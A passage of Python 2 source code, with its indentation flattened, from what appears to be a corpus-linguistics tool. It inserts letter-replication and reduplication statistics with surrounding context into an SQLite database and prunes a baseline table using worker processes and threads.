# thread_name = "baseline_insrt"
# self.baseline_insert_temporized_data(self.temporized_baseline,thread_name=thread_name)
# self.temporized_baseline= defaultdict(int)
# def baseline_insert_left_over_data(self,thread_name="Thread0"):
# thread_name = "baseline_insrt"
# self.baseline_insert_temporized_data(self.temporized_baseline,thread_name=thread_name)
# self.temporized_baseline= defaultdict(int)
def baseline_lazyinsertion_into_db(self,db_writer,computed_baseline,extracted_redu_in_text_container, baseline_insertion_border=100000,thread_name="Thread0", ):
#l = len(self.temporized_baseline)
#p((l, baseline_insertion_border))
if len(self.temporized_baseline) > baseline_insertion_border:
self.temporize_baseline(computed_baseline, extracted_redu_in_text_container)
#self.baseline_intime_insertion_into_db()
self._send_data_to_dbwriter(db_writer,"baseline", thread_name)
else:
self.temporize_baseline(computed_baseline,extracted_redu_in_text_container)
#self.insert_temporized_baseline_into_db()
def temporize_baseline(self, computed_baseline,extracted_redu_in_text_container):
#self.temporized_baseline = defaultdict(int)
#p(computed_baseline, "computed_baseline")
for syntagma in computed_baseline:
#p(syntagma)
#if "@ronetejaye" in syntagma:
# p(syntagma, "syntagma")
self.temporized_baseline[syntagma] += 1
#if add_also_repeted_redu:
for sent in extracted_redu_in_text_container:
for redu in sent:
if redu:
#p((redu["word"],),"re_wo")
self.temporized_baseline[(redu["word"],)] += redu["length"]-1
#computed_baseline += [(redu["word"],)]*(redu["length"]-1) # -1, because 1 occur of this unigramm is already in the baseline
self.logger.low_debug("BaselineStats for current text-element was temporized.")
def insert_repl_into_db(self,db_writer,doc_elem,text_elem,extracted_repl_in_text_container, repl_free_text_container,rle_for_repl_in_text_container, redu_free_text_container,mapping_redu,stemmed_text_container, thread_name="Thread0"):
#self.logger.low_debug("Insertion of current ReplsIntoDB was started")
sent_index = -1
redufree_len = tuple(len(sent) for sent in redu_free_text_container)
#p((redu_free_text_container,redufree_len, ))
#p(mapping_redu, "mapping_redu")
for sent in extracted_repl_in_text_container:
#p(sent, "sent")
sent_index += 1
token_index = -1
#temp_next_left_index_in_orig_t_elem = mapping_redu[sent_index][temp_index]
#p((doc_elem))
for repls_for_current_token in sent:
token_index += 1
if repls_for_current_token:
#p(repls_for_current_token, "repls_for_current_token")
for repl_container in repls_for_current_token:
#p(repl_container, "repl_container")
if repl_container:
try:
#p((sent_index, token_index), c="c")
current_sent_from_map = mapping_redu[sent_index]
next_left_index_in_orig_t_elem = token_index if token_index in current_sent_from_map else nextLowest(current_sent_from_map,token_index)
token_index_in_redu_free = current_sent_from_map.index(next_left_index_in_orig_t_elem)
it_is_redu = self._is_redu(sent_index,token_index_in_redu_free,redu_free_text_container)
input_dict = {
"doc_id": doc_elem[0],
# "doc_id": doc_elem[self._id_field_name],
'redufree_len':redufree_len,
"index_in_corpus": (sent_index,token_index),
"index_in_redufree": (sent_index,token_index_in_redu_free),
"rle_word": rle_for_repl_in_text_container[sent_index][token_index],
"pos":text_elem[sent_index][0][next_left_index_in_orig_t_elem][1] if it_is_redu else text_elem[sent_index][0][token_index][1],
"normalized_word": repl_free_text_container[sent_index][token_index],
"stemmed":stemmed_text_container[sent_index][token_index_in_redu_free],
"polarity":text_elem[sent_index][1],
"repl_letter": repl_container[0],
"repl_length": repl_container[1],
"index_of_repl": repl_container[2],
"in_redu": (sent_index,token_index_in_redu_free) if it_is_redu else None
}
except Exception as e:
#p(sent_container, "sent_container")
self._terminated.value = True
msg = "Given ReplContainer has wrong structure! '{}'. ('{}')".format(repl_container, repr(e))
self.logger.error(msg)
self.threads_status_bucket.put({"name":thread_name, "status":"failed", "info":msg})
return False
#p(((sent_index, token_index),repl_free_text_container[sent_index][token_index], ), "GET KONTEXT FueR DAS WORD")
#input_dict =
self._get_context_left_for_repl(input_dict, text_elem, token_index_in_redu_free, mapping_redu, redu_free_text_container, sent_index,stemmed_text_container,)
#input_dict =
self._get_context_right_for_repl(input_dict, text_elem, token_index_in_redu_free, mapping_redu, redu_free_text_container, sent_index,stemmed_text_container,)
self._repl_inserter(db_writer,input_dict, thread_name=thread_name)
#p(input_dict, "input_dict")
#self.statsdb.lazyinsert("replications", input_dict, thread_name=thread_name)
#self.logger.low_debug("Insertion of current ReplsIntoDB was finished")
def _repl_inserter(self,db_writer, inp_dict, thread_name="Thread0"):
if len(self.temporized_repl[thread_name]) > self._lazyness_border:
self._temporize_repl(inp_dict, thread_name=thread_name)
self._send_data_to_dbwriter(db_writer,"replications",thread_name)
else:
self._temporize_repl(inp_dict, thread_name=thread_name)
def _temporize_repl(self, inp_dict,thread_name="Thread0"):
temp_list = []
for col in self._repls_cols:
temp_list.append(inp_dict.get(col,None))
#temp_list.append()
self.temporized_repl[thread_name].append(db_helper.values_to_list(temp_list, "one"))
def _redu_inserter(self,db_writer, inp_dict, thread_name="Thread0"):
if len(self.temporized_redu[thread_name]) > self._lazyness_border:
self._temporize_redu(inp_dict, thread_name=thread_name)
self._send_data_to_dbwriter(db_writer,"reduplications",thread_name)
else:
self._temporize_redu(inp_dict, thread_name=thread_name)
def _temporize_redu(self, inp_dict,thread_name="Thread0"):
temp_list = []
for col in self._redus_cols:
temp_list.append(inp_dict.get(col,None))
#temp_list.append()
self.temporized_redu[thread_name].append(db_helper.values_to_list(temp_list, "one"))
def insert_redu_into_db(self,db_writer,doc_elem,text_elem,extracted_redu_in_text_container, redu_free_text_container, rle_for_repl_in_text_container, repl_free_text_container, mapping_redu,stemmed_text_container,thread_name="Thread0"):
#self.logger.low_debug("Insertion of current RedusIntoDB was started")
sent_index = -1
#p(extracted_redu_in_text_container, "extracted_redu_in_text_container")
redufree_len = tuple(len(sent) for sent in redu_free_text_container)
for redu_in_sent in extracted_redu_in_text_container:
sent_index += 1
for redu in redu_in_sent:
#p(redu, c="r")
#if redu:
#p(redu_in_sent, "redu_in_sent")
#p(redu_free_text_container, "redu_free_text_container")
try:
rle_word = rle_for_repl_in_text_container[sent_index][redu['start_index_in_orig']]
#p((redu['start_index_in_orig'],rle_for_repl_in_text_container[sent_index][redu['start_index_in_orig']]), "redu['start_index_in_orig']", c="m")
#p(redu_free_text_container[sent_index][redu['index_in_redu_free']], "orig_words")
index_in_redu_free = redu["index_in_redu_free"]
input_dict = {
"doc_id": doc_elem[0],
# "doc_id": doc_elem[self._id_field_name],
'redufree_len':redufree_len,
"index_in_corpus": (sent_index,redu['start_index_in_orig']),
"index_in_redufree": (sent_index,index_in_redu_free),
#"rle_word": rle_word if rle_word else repl_free_text_container[sent_index][redu['start_index_in_orig']],
"pos":text_elem[sent_index][0][redu['start_index_in_orig']][1],
"normalized_word": repl_free_text_container[sent_index][redu['start_index_in_orig']],
"stemmed":stemmed_text_container[sent_index][index_in_redu_free],
'orig_words':redu_free_text_container[sent_index][index_in_redu_free][1],
"redu_length": redu['length'],
"polarity":text_elem[sent_index][1],
#"repl_letter": repl_container[0],
#"index_of_repl": repl_container[2],
}
except Exception as e:
#p(sent_container, "sent_container")
self._terminated.value = True
msg = "Given ReduContainer has wrong structure! '{}'. ('{}')".format(redu, e)
self.logger.error(msg)
self.threads_status_bucket.put({"name":thread_name, "status":"failed", "info":msg})
return False
#sent =
start_index = redu['start_index_in_orig']
#redu_length = redu['length']
#input_dict =
self._get_context_left_for_redu(input_dict, text_elem, mapping_redu, redu_free_text_container,sent_index , redu,stemmed_text_container,)
#input_dict =
self._get_context_right_for_redu(input_dict, text_elem, mapping_redu, redu_free_text_container, sent_index,redu,stemmed_text_container,)
#p("RIGHT STOP ---------------------\n", c="c")
#self.statsdb.lazyinsert("reduplications", input_dict, thread_name=thread_name)
self._redu_inserter(db_writer,input_dict, thread_name=thread_name)
#p(input_dict, "input_dict")
#self.logger.low_debug("Insertion of current RedusIntoDB was finished")
def _get_context_left_for_repl(self, input_dict, text_elem, token_index_in_redu_free, mapping_redu, redu_free_text_container, sent_index,stemmed_text_container,):
### context left
#p(token_index_in_redu_free, "1token_index_in_redu_free")
for context_number in range(1,self._context_lenght+1):
col_name_context = "contextL{}".format(context_number)
col_name_info = "context_infoL{}".format(context_number)
#p(token_index_in_redu_free, "2token_index_in_redu_free")
temp_index = token_index_in_redu_free - context_number
## if needed context_item in the current sent
#p((context_number,sent_index,temp_index))
if temp_index >= 0:
temp_next_left_index_in_orig_t_elem = mapping_redu[sent_index][temp_index]
try:
#p((redu_free_text_container,sent_index, temp_index), "redu_free_text_container")
redu_free_text_container[sent_index][temp_index][1].items
item = redu_free_text_container[sent_index][temp_index][0]
info = (text_elem[sent_index][0][temp_next_left_index_in_orig_t_elem][1],
redu_free_text_container[sent_index][temp_index][1],
stemmed_text_container[sent_index][temp_index])
#info = text_elem[sent_index][0][temp_index][1]
except :
#p(repr(e), "E1")
item = redu_free_text_container[sent_index][temp_index]
info = (text_elem[sent_index][0][temp_next_left_index_in_orig_t_elem][1],
None,
stemmed_text_container[sent_index][temp_index])
else: ## if needed context_item not in the current sent
#leftover_contextnumber = context_number - token_index # left over times to go to the left
leftover_contextnumber = context_number - token_index_in_redu_free # left over times to go to the left
if not context_number: # if the not time to go to the left
#p("WrongContextNumber. It should be >0", c="r")
raise Exception, "WrongContextNumber. It should be >0"
number_of_loops = 0
while True:
number_of_loops += 1
temp_sent_index = sent_index - number_of_loops
if temp_sent_index < 0:
item = None
info = None
break
last_sent = redu_free_text_container[temp_sent_index+1]
current_sent = redu_free_text_container[temp_sent_index]
leftover_contextnumber = leftover_contextnumber if number_of_loops == 1 else leftover_contextnumber-(len(last_sent))
if leftover_contextnumber <= len(current_sent) and leftover_contextnumber >= 0:
temp_index = -leftover_contextnumber
temp_next_left_index_in_orig_t_elem = mapping_redu[temp_sent_index][temp_index]
current_sent_from_map = mapping_redu[temp_sent_index]
temp_token_index_in_redu_free = current_sent_from_map.index(temp_next_left_index_in_orig_t_elem)
try:
redu_free_text_container[temp_sent_index][temp_index][1].items
item = redu_free_text_container[temp_sent_index][temp_index][0]
info = (
text_elem[temp_sent_index][0][temp_next_left_index_in_orig_t_elem][1],
redu_free_text_container[temp_sent_index][temp_index][1],
stemmed_text_container[temp_sent_index][temp_token_index_in_redu_free])
#info = text_elem[temp_sent_index][0][temp_index][1]
except :
#p(e, "E2")
item = redu_free_text_container[temp_sent_index][temp_index]
info = (text_elem[temp_sent_index][0][temp_next_left_index_in_orig_t_elem][1],
None,
stemmed_text_container[temp_sent_index][temp_token_index_in_redu_free])
break
#text_elem[sent_index][0][token_index][1]
#item = json.dumps(item)
input_dict.update({col_name_context: item, col_name_info:info})
return input_dict
def _get_context_right_for_repl(self, input_dict, text_elem, token_index_in_redu_free, mapping_redu, redu_free_text_container, sent_index,stemmed_text_container,):
#context right
for context_number in range(1,self._context_lenght+1):
col_name_context = "contextR{}".format(context_number)
col_name_info = "context_infoR{}".format(context_number)
#while True:
#temp_index = token_index + context_number
temp_index = token_index_in_redu_free + context_number
## if needed context_item in the current sent
if temp_index < len(redu_free_text_container[sent_index]):
####p((sent_index, temp_index, len(mapping_redu[sent_index])), "temp_next_left_index_in_orig_t_elem")
temp_next_left_index_in_orig_t_elem = mapping_redu[sent_index][temp_index]
try:
redu_free_text_container[sent_index][temp_index][1].items
item = redu_free_text_container[sent_index][temp_index][0]
info = (text_elem[sent_index][0][temp_next_left_index_in_orig_t_elem][1],
redu_free_text_container[sent_index][temp_index][1],
stemmed_text_container[sent_index][temp_index])
#info = text_elem[sent_index][0][temp_index][1]
except :
item = redu_free_text_container[sent_index][temp_index]
info = (text_elem[sent_index][0][temp_next_left_index_in_orig_t_elem][1],
None,
stemmed_text_container[sent_index][temp_index])
else: ## if needed context_item not in the current sent
#leftover_contextnumber = context_number - (len(sent) - (token_index+1)) # left over times to go to the left
leftover_contextnumber = context_number - (len(redu_free_text_container[sent_index]) - (token_index_in_redu_free+1)) # left over times to go to the left
if not leftover_contextnumber: # if the not time to go to the left
raise Exception, "1. WrongContextNumber. It should be >0"
number_of_loops = 0
while True:
number_of_loops += 1
temp_sent_index = sent_index + number_of_loops
if temp_sent_index >= len(redu_free_text_container):
item = None
info = None
break
last_sent = redu_free_text_container[temp_sent_index-1]
current_sent = redu_free_text_container[temp_sent_index]
leftover_contextnumber = leftover_contextnumber if number_of_loops == 1 else leftover_contextnumber-(len(last_sent))
if leftover_contextnumber <= 0 :
raise Exception, "2. WrongLeftoverContextNumber. It should be >0"
if leftover_contextnumber <= len(current_sent) and leftover_contextnumber > 0:
temp_index =leftover_contextnumber-1
temp_next_left_index_in_orig_t_elem = mapping_redu[temp_sent_index][temp_index]
current_sent_from_map = mapping_redu[temp_sent_index]
temp_token_index_in_redu_free = current_sent_from_map.index(temp_next_left_index_in_orig_t_elem)
try:
redu_free_text_container[temp_sent_index][temp_index][1].items
item = redu_free_text_container[temp_sent_index][temp_index][0]
info = (text_elem[temp_sent_index][0][temp_next_left_index_in_orig_t_elem][1],
redu_free_text_container[temp_sent_index][temp_index][1],
stemmed_text_container[temp_sent_index][temp_token_index_in_redu_free])
except :
#p("444")
item = redu_free_text_container[temp_sent_index][temp_index]
info = (text_elem[temp_sent_index][0][temp_next_left_index_in_orig_t_elem][1],
None,
stemmed_text_container[temp_sent_index][temp_token_index_in_redu_free])
break
#item = json.dumps(item)
input_dict.update({col_name_context: item, col_name_info:info})
return input_dict
def _get_context_right_for_redu(self, input_dict, text_elem, mapping_redu, redu_free_text_container, sent_index,redu,stemmed_text_container,):
## context right
#p("---------------------\nRIGHT START", c="c")
for context_number in range(1,self._context_lenght+1):
col_name_context = "contextR{}".format(context_number)
col_name_info = "context_infoR{}".format(context_number)
#while True:
temp_index = redu['index_in_redu_free'] + context_number
#p((context_number,sent_index,temp_index,len(redu_in_sent)), "context_number,sent_index,temp_index,len(redu_in_sent)")
## if needed context_item in the current sent
if temp_index < len(redu_free_text_container[sent_index]):
#item = redu_free_text_container[sent_index][temp_index]
token_index_in_orig_t_elem = mapping_redu[sent_index][temp_index]
#p((sent_index,temp_index, token_index_in_orig_t_elem), "sent_index,temp_index, token_index_in_orig_t_elem")
try:
#p("111")
redu_free_text_container[sent_index][temp_index][1].items
item = redu_free_text_container[sent_index][temp_index][0]
info = (text_elem[sent_index][0][token_index_in_orig_t_elem][1],
redu_free_text_container[sent_index][temp_index][1],
stemmed_text_container[sent_index][temp_index])
#info = text_elem[sent_index][0][temp_index][1]
except:
#p("222")
item = redu_free_text_container[sent_index][temp_index]
info = (text_elem[sent_index][0][token_index_in_orig_t_elem][1],
None,
stemmed_text_container[sent_index][temp_index])
#p((item, info), c="b")
#info = rle_for_repl_in_text_container[sent_index][start_index:start_index+redu['length']]
#info = text_elem[sent_index][0][temp_index][1]
#p((col_name_context,item, info), "item", c="m")
else: ## if needed context_item not in the current sent
leftover_contextnumber = context_number - (len(redu_free_text_container[sent_index]) - (redu['index_in_redu_free']+1)) # left over times to go to the left
if not leftover_contextnumber: # if the not time to go to the left
raise Exception, "1. WrongContextNumber. It should be >0"
number_of_loops = 0
while True:
number_of_loops += 1
temp_sent_index = sent_index + number_of_loops
if temp_sent_index >= len(redu_free_text_container):
item = None
info = None
#p((item, info), c="b")
break
last_sent = redu_free_text_container[temp_sent_index-1]
current_sent = redu_free_text_container[temp_sent_index]
leftover_contextnumber = leftover_contextnumber if number_of_loops == 1 else leftover_contextnumber-(len(last_sent))
if leftover_contextnumber <= 0 :
raise Exception, "2. WrongLeftoverContextNumber. It should be >0"
if leftover_contextnumber <= len(current_sent) and leftover_contextnumber > 0:
temp_index = leftover_contextnumber-1
token_index_in_orig_t_elem = mapping_redu[temp_sent_index][temp_index]
#p((temp_sent_index,temp_index, token_index_in_orig_t_elem), "sent_index,temp_index, token_index_in_orig_t_elem")
try:
#p("333")
redu_free_text_container[temp_sent_index][temp_index][1].items
item = redu_free_text_container[temp_sent_index][temp_index][0]
info = (text_elem[temp_sent_index][0][token_index_in_orig_t_elem][1],
redu_free_text_container[temp_sent_index][temp_index][1],
stemmed_text_container[temp_sent_index][temp_index])
#info = text_elem[temp_sent_index][0][temp_index][1]
except:
#p("444")
item = redu_free_text_container[temp_sent_index][temp_index]
info = (text_elem[temp_sent_index][0][token_index_in_orig_t_elem][1],
None,
stemmed_text_container[temp_sent_index][temp_index])
#p((item, info), c="b")
#info = [number_of_loops, temp_sent_index, leftover_contextnumber]
#item = current_sent[temp_index]
#info = text_elem[temp_sent_index][0][temp_index][1]
#p((col_name_context,item,info), c="r")
break
#item = json.dumps(item)
input_dict.update({col_name_context: item, col_name_info:info})
return input_dict
def _get_context_left_for_redu(self, input_dict, text_elem, mapping_redu, redu_free_text_container, sent_index,redu,stemmed_text_container,):
### context Left
for context_number in range(1,self._context_lenght+1):
col_name_context = "contextL{}".format(context_number)
col_name_info = "context_infoL{}".format(context_number)
#while True:
temp_index = redu['index_in_redu_free'] - context_number
## if needed context_item in the current sent
if (temp_index) >= 0:
token_index_in_orig_t_elem = mapping_redu[sent_index][temp_index]
try:
redu_free_text_container[sent_index][temp_index][1].items
item = redu_free_text_container[sent_index][temp_index][0]
info = (text_elem[sent_index][0][token_index_in_orig_t_elem][1],
redu_free_text_container[sent_index][temp_index][1],
stemmed_text_container[sent_index][temp_index])
#info = text_elem[sent_index][0][temp_index][1]
except:
item = redu_free_text_container[sent_index][temp_index]
info = (text_elem[sent_index][0][token_index_in_orig_t_elem][1],
None,
stemmed_text_container[sent_index][temp_index])
#'start_index_in_orig'
#p((col_name_context,item, info), "item", c="m")
else: ## if needed context_item not in the current sent
leftover_contextnumber = context_number - redu['index_in_redu_free'] # left over times to go to the left
if not context_number: # if the not time to go to the left
raise Exception, "WrongContextNumber. It should be >0"
number_of_loops = 0
while True:
number_of_loops += 1
temp_sent_index = sent_index - number_of_loops
if temp_sent_index < 0:
item = None #[number_of_loops, temp_sent_index, leftover_contextnumber]
info = None
break
last_sent = redu_free_text_container[temp_sent_index+1]
current_sent = redu_free_text_container[temp_sent_index]
leftover_contextnumber = leftover_contextnumber if number_of_loops == 1 else leftover_contextnumber-(len(last_sent))
if leftover_contextnumber <= len(current_sent) and leftover_contextnumber >= 0:
#item = current_sent[-leftover_contextnumber]
#p(leftover_contextnumber, "leftover_contextnumber")
#info = text_elem[temp_sent_index][0][-leftover_contextnumber][1]
#info = rle_for_repl_in_text_container[sent_index][start_index:start_index+redu['length']]
temp_index = -leftover_contextnumber
token_index_in_orig_t_elem = mapping_redu[temp_sent_index][temp_index]
try:
redu_free_text_container[temp_sent_index][temp_index][1].items
item = redu_free_text_container[temp_sent_index][temp_index][0]
info = (text_elem[temp_sent_index][0][token_index_in_orig_t_elem][1],
redu_free_text_container[temp_sent_index][temp_index][1],
stemmed_text_container[temp_sent_index][temp_index])
#info = text_elem[temp_sent_index][0][temp_index][1]
except:
item = redu_free_text_container[temp_sent_index][temp_index]
info = (text_elem[temp_sent_index][0][token_index_in_orig_t_elem][1],
None,
stemmed_text_container[temp_sent_index][temp_index])
break
#text_elem[sent_index][0][redu['index_in_redu_free']][1]
#item = json.dumps(item)
input_dict.update({col_name_context: item, col_name_info:info})
return input_dict
###################Optimizators########################
# def get_streams_from_baseline(self,stream_number, max_scope=False,size_to_fetch=1, split_syntagma=False):
# row_num = self.statsdb.rownum("baseline")
# rows_pro_stream = row_num/stream_number
# streams = []
# num_of_getted_items = 0
# for i in range(stream_number):
# thread_name = "BSThread{}".format(i)
# # p((i,thread_name ), "get_streams_from_baseline")
# if i < (stream_number-1): # for gens in between
# gen = self._baseline("*",max_scope=False,thread_name=thread_name,limit=rows_pro_stream, offset=num_of_getted_items,size_to_fetch=size_to_fetch, split_syntagma=split_syntagma)
# num_of_getted_items += rows_pro_stream
# streams.append((thread_name,LenGen(gen, rows_pro_stream)))
# else: # for the last generator
# gen = self._baseline("*",max_scope=False,thread_name=thread_name,limit=-1, offset=num_of_getted_items,size_to_fetch=size_to_fetch, split_syntagma=split_syntagma)
# streams.append((thread_name,LenGen(gen, row_num-num_of_getted_items)))
# return streams
def get_streams_from_baseline(self,stream_number, max_scope=False,size_to_fetch=1, split_syntagma=False):
row_num = self.statsdb.rownum("baseline")
rows_pro_stream = row_num/stream_number
streams = []
num_of_getted_items = 0
def intern_sender(pipe, gen, length, chunk_size= 10000):
#result = pipe.recv()
#sended_num = 0
#was_close = False
while True:
command = pipe.recv()
if command == "+":
i = 0
while i <= chunk_size:
try:
g = next(gen)
except StopIteration:
pipe.send(None)
break
#p(g, "SENDER", c="r")
#pipe.send(next(gen))
pipe.send(g)
i += 1
#sended_num += i
pipe.send(False)
else:
#was_close = True
#pipe.close()
break
pipe.send(None)
pipe.send(None)
for i in range(stream_number):
thread_name = "BSThread{}".format(i)
parent, child = Pipe()
# p((i,thread_name ), "get_streams_from_baseline")
if i < (stream_number-1): # for gens in between
gen = self._baseline("*",max_scope=False,thread_name=thread_name,limit=rows_pro_stream, offset=num_of_getted_items,size_to_fetch=size_to_fetch, split_syntagma=split_syntagma)
sender = Process(target=intern_sender, args=(parent, gen, rows_pro_stream, 10000))
sender.start()
streams.append((thread_name,rows_pro_stream,child,sender))
#streams.append((thread_name,LenGen(gen, rows_pro_stream)))
num_of_getted_items += rows_pro_stream
else: # for the last generator
gen = self._baseline("*",max_scope=False,thread_name=thread_name,limit=-1, offset=num_of_getted_items,size_to_fetch=size_to_fetch, split_syntagma=split_syntagma)
#streams.append((thread_name,LenGen(gen, row_num-num_of_getted_items)))
sender = Process(target=intern_sender, args=(parent, gen, row_num-num_of_getted_items, 10000))
sender.start()
#streams.append((thread_name,LenGen(intern_gen(-1, num_of_getted_items), row_num-num_of_getted_items)))
streams.append((thread_name,row_num-num_of_getted_items,child,sender))
return streams
def _check_termination(self, thread_name="Thread0"):
if self._terminated.value:
self.logger.critical("'{}'-Thread was terminated.".format(thread_name))
self.threads_status_bucket.put({"name":thread_name, "status":"terminated"})
sys.exit()
def convert_queue_to_list(self,inp_queue):
output_list = []
while True:
if inp_queue.empty():
break
else:
output_list.append(inp_queue.get())
#del inp_queue
#gc.collect()
return output_list
def clean_baseline_table(self,stream_number=1, min_row_pro_sream=1000, cpu_percent_to_get=50, adjust_to_cpu=True):
#p(self.statsdb.rownum("baseline"))
#print(self.statsdb.rownum("baseline"),"self.statsdb.rownum(baseline)")
#min_row_pro_sream= 10
if adjust_to_cpu:
stream_number= get_number_of_streams_adjust_cpu( min_row_pro_sream, self.statsdb.rownum("baseline"), stream_number, cpu_percent_to_get=cpu_percent_to_get)
if stream_number is None or stream_number==0:
#p((self._get_number_of_left_over_files(),self.counter_lazy_getted),"self._get_number_of_left_over_files()")
self.logger.error("StreamNumber is 0. Not generators could be returned.", exc_info=self._logger_traceback)
return []
#p(stream_number,"stream_number")
#print("111")
self._init_compution_variables()
#print("222")
streams= self.get_streams_from_baseline(stream_number, split_syntagma=False)
#p(len(streams),"streams")
#self._terminated.value = False
#print("333")
if self._status_bar:
try:
if not self.status_bars_manager.enabled:
self.status_bars_manager = self._get_status_bars_manager()
except:
self.status_bars_manager = self._get_status_bars_manager()
status_bar_start = self._get_new_status_bar(None, self.status_bars_manager.term.center("StatsDB-Optimization") , "", counter_format=self.status_bars_manager.term.bold_white_on_cyan("{fill}{desc}{fill}"))
status_bar_start.refresh()
status_bar_threads_init = self._get_new_status_bar(len(streams), "ThreadsStarted", "threads")
#status_bar_current = self._get_new_status_bar(self.statsdb.rownum("baseline"), "{}:BaselineOptimization".format(thread_name), "syntagma")
#if self._status_bar:
self._threads_num = len(streams)
row_num_bevore = self.statsdb.rownum("baseline")
if self._threads_num>1:
if self._status_bar:
unit = "syntagma"
self.main_status_bar = self._get_new_status_bar(row_num_bevore, "AllThreadsTotalInsertions", unit)
self.main_status_bar.refresh()
else:
self.main_status_bar = False
syntagmas_to_delete_queue = Queue()
#p(len(syntagmas_to_delete_queue), "syntagmas_to_delete_queue")
for stream in streams:
reciever = stream[2]
sender = stream[3]
thread_name = stream[0]
length = stream[1]
#if not self._isrighttype(gen):
# self.logger.error("StatsBaselineCleanError: Given InpData not from right type. Please give an list or an generator.", exc_info=self._logger_traceback)
# return False
#p(gen)
#if self._status_bar:
thread_name = stream[0]
status_bar_current = self._get_new_status_bar(length, "{}:".format(thread_name), "syntagma") if self._status_bar else False
processThread = threading.Thread(target=self._clean_baseline_table, args=(reciever,sender,syntagmas_to_delete_queue, status_bar_current,thread_name), name=thread_name)
processThread.setDaemon(True)
processThread.start()
self.active_threads.append(processThread)
if self._status_bar:
status_bar_threads_init.update(incr=1)
#i+=1
time.sleep(1)
#for _t in self.active_threads:
# _t.join()
if not self._wait_till_all_threads_are_completed("Compute"):
return False
del self.active_threads
self.active_threads = []
gc.collect()
#row_num_bevore = self.statsdb.rownum("baseline")
##### delete syntagmas from baseline-table
qeary = "DELETE FROM baseline WHERE syntagma = ?;"
#p(len(syntagmas_to_delete_queue), "syntagmas_to_delete_queue")
syntagmas_to_delete_list = self.convert_queue_to_list(syntagmas_to_delete_queue)
del syntagmas_to_delete_queue
gc.collect()
#syntagmas_to_delete_queue = [ for _s in syntagmas_to_delete_queue if syntagmas_to_delete_queue.]
if syntagmas_to_delete_list:
self.statsdb.executemany(qeary,syntagmas_to_delete_list)
len_syntagmas_to_delete_list = len(syntagmas_to_delete_list)
del syntagmas_to_delete_list
gc.collect()
row_num_after = self.statsdb.rownum("baseline")
self.statsdb._commit(write_all_cash=True)
if self._status_bar:
status_bar_total_summary = self._get_new_status_bar(None, self.status_bars_manager.term.center("Syntagmas: Bevore:'{}'; After:'{}'; Removed: '{}'.".format(row_num_bevore, row_num_after, row_num_bevore-row_num_after ) ), "", counter_format=self.status_bars_manager.term.bold_white_on_cyan('{fill}{desc}{fill}\n'))
status_bar_total_summary.refresh()
self.status_bars_manager.stop()
#p(len(syntagmas_to_delete_list), "syntagmas_to_delete_list")
#syntagmas_to_delete_list = []
if (row_num_bevore-row_num_after) == len_syntagmas_to_delete_list:
if self._status_bar:
self.logger.info("Baseline-Table was cleaned.")
else:
self.logger.info("Baseline-Table was cleaned.")
return True
else:
False
def _clean_baseline_table(self, pipe_reciever, sender,syntagmas_to_delete_queue,status_bar_current, thread_name="Thread0"):
try:
if not self._check_stats_db_should_exist():
return False
#return
### compute syntagmas to delete
minimum_columns = False
indexes = self.col_index_min if minimum_columns else self.col_index_orig
#indexes = self.col_index_min
case = "" if self._case_sensitiv else " COLLATE NOCASE "
#for baseline_container in gen:
pipe_reciever.send("+")
while True:
#try:
baseline_container = pipe_reciever.recv()
#p(baseline_container, "RECIEVER"+thread_name, )
#except IOError:
# break
if not baseline_container:
if baseline_container is False:
pipe_reciever.send("+")
continue
elif baseline_container is None:
sender.terminate()
del sender
pipe_reciever.close()
break
#baseline_container = pipe_reciever.recv()
else:
continue
was_found = False
if self._status_bar:
status_bar_current.update(incr=1)
if self.main_status_bar:
self.main_status_bar.update(incr=1)
#self._check_termination(thread_name=thread_name)
inp_syntagma_splitted = baseline_container[0].split(self._baseline_delimiter)
scope = len(inp_syntagma_splitted)
syntagma_type = "lexem"
where = self._get_where_statement(inp_syntagma_splitted,scope=scope,thread_name=thread_name,
with_context=True,syntagma_type=syntagma_type)
collected_w = ()
for w in where:
#p(w, "w")
#_threads_cursors["Thread0"].execute("SELECT id FROM replications WHERE {} ;".format(" AND ".join(w)))
if w:
current_reps = self.statsdb._threads_cursors[thread_name].execute(u"SELECT id FROM replications WHERE {} {};".format(u" AND ".join(w), case)).fetchone()
#current_reps = self.statsdb.getone("replications", where=w,connector_where="AND",case_sensitiv=self._case_sensitiv,thread_name=thread_name)
#tuple(self._rep_getter_from_db("repl",inp_syntagma_splitted,scope=scope,where=w,thread_name=thread_name, for_optimization=True))
if current_reps:
#p("REPL was found")
was_found = True
break
collected_w += (w,)
else:
self.logger.error("No where Statements was given. Probably an ImplementationsError.")
return False
#else:
## Step 2: If no one repls was found, than search for redus
if was_found:
continue
for w in collected_w:
#collected_w.append(w)
if w:
current_reps = self.statsdb._threads_cursors[thread_name].execute(u"SELECT id FROM reduplications WHERE {} {};".format(u" AND ".join(w), case)).fetchone()
#current_reps = current_reps = self.statsdb.getone("reduplications", where=w,connector_where="AND",case_sensitiv=self._case_sensitiv,thread_name=thread_name)
#tuple(self._rep_getter_from_db("redu",inp_syntagma_splitted,scope=scope,where=w,thread_name=thread_name, for_optimization=True))
if current_reps:
#p("REDU was found")
was_found = True
break
else:
self.logger.error("No where Statements was given. Probably an ImplementationsError.")
return False
if was_found:
continue
#syntagmas_to_delete_queue.append((baseline_container[0],))
syntagmas_to_delete_queue.put((baseline_container[0],))
self.threads_status_bucket.put({"name":thread_name, "status":"done"})
return True
except Exception, e:
print_exc_plus() if self._ext_tb else ""
msg = "_CleanBaselineTableError: See Exception: '{}'. ".format(e)
self.logger.error(msg, exc_info=self._logger_traceback)
self.threads_status_bucket.put({"name":thread_name, "status":"failed", "info":msg})
self._terminated.value = True
self.statsdb.rollback()
return False
def _check_baseline_consistency(self):
try:
#p(baseline, "baseline")
if self._status_bar:
try:
if not self.status_bars_manager.enabled:
self.status_bars_manager = self._get_status_bars_manager()
except:
self.status_bars_manager = self._get_status_bars_manager()
status_bar_start = self._get_new_status_bar(None, self.status_bars_manager.term.center("Baseline-ConsistencyTest") , "", counter_format=self.status_bars_manager.term.bold_white_on_cyan("{fill}{desc}{fill}"))
status_bar_start.refresh()
normalized_word_tag = db_helper.tag_normalized_word
consistency = True
# counter_inconsistency = 0
###############################
num = self.statsdb.rownum("baseline")
if self._status_bar:
status_bar_current = self._get_new_status_bar(num, "BaselineCheck:", "syntagma")
#indexes = self.col_index_min if minimum_columns else self.col_index_orig
indexes = self.col_index_orig
ix_syntagma = indexes["baseline"]["syntagma"]
ix_scope = indexes["baseline"]["scope"]
ix_stemmed = indexes["baseline"]["stemmed"]
for r in self.statsdb.lazyget("baseline"):
if self._status_bar:
status_bar_current.update(incr=1)
